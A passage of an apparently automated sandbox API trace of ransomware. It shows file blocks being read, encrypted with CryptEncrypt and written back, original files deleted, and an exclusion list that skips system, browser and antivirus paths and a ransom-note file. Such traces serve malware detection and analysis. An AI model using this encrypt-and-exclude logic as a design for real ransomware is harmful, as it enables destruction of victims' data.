returned 1 [0163.354] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.354] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.354] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.354] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.354] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.354] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.354] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.354] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.354] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.354] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.354] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.354] GetLastError () returned 0x0 [0163.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.355] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.355] GetLastError () returned 0x0 [0163.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.355] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.355] GetLastError () returned 0x0 [0163.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.355] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.355] GetLastError () returned 0x0 [0163.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.355] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.355] GetLastError () returned 0x0 [0163.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.355] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.355] GetLastError () returned 0x0 [0163.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.355] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.355] GetLastError () returned 0x0 [0163.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.355] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.356] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.356] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.356] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.356] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.356] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.356] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.356] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.356] GetLastError () returned 0x0 [0163.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.357] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.357] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.357] GetLastError () returned 0x0 [0163.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.357] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.357] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.357] GetLastError () returned 0x0 [0163.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.357] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.357] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.357] GetLastError () returned 0x0 [0163.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.359] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf") returned 1 [0163.359] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0 [0163.359] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" [0163.359] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.359] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF182.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf182.tmp")) returned 0xf182 [0163.360] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF182.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf182.tmp"), dwFlags=0x1) returned 0 [0163.360] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF182.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf182.tmp")) returned 1 [0163.360] CryptDestroyKey (hKey=0x9ad338) returned 1 [0163.360] wcslen (_String="OK") returned 0x2 [0163.360] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.360] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.360] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0163.360] CryptDestroyHash (hHash=0x9ad738) returned 1 [0163.360] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*NMCRYPT") returned 0 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*Recovers your files.html") returned 0 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.exe") returned 0 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.dll") returned 0 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.lnk") returned 0 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.bat") returned 0 [0163.360] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.ini") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.msi") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*.scf") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*pagefile.sys*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*NTUSER.DAT*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*AppData*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\winrar\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\java\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\windows\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\ESET\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\AVG\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\AVIRA\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*Atheros*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*Realtek*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*bootmgr*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*boot*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*boot*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*CONFIG.SYS*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*IO.SYS*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*MSDOS.SYS*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*NTDETECT.COM*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*ntldr*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*chrome*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*opera*") returned 0 [0163.361] PathMatchSpecW (pszFile="Green Bubbles.htm", pszSpec="*firefox*") returned 0 [0163.361] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", pszSpec="*") returned 1 [0163.361] strlen (_Str="NMoreira") returned 0x8 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 